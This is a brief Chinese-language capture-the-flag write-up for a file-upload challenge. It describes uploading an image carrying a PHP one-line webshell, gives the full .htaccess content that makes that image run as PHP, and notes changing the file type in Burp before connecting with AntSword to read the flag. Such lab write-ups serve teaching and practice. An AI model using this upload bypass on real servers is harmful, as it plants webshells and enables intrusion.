题目
点进页面显示如下
上传文件,先随便上传一个文件看看情况
构造含有一句话木马的图片上传
访问显示错误
这里参考了大佬的wp,上传一个.htaccess文件,这个.htaccess文件的作用就是把这个图片文件解析成php代码执行
.htaccess文件的内容为
<FilesMatch "2222.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
这里用bp抓包修改类型
上传成功
访问
http://89577a55-c3b7-4c47-a9ef-4cafc3fd5fb4.node4.buuoj.cn:81/upload/f219c4e7db2f533060f7d3e3a21ed39b/2222.jpg
回显一片空白,说明木马上传成功
使用蚁剑链接
在根目录找到flag
得到flag
参考文章链接: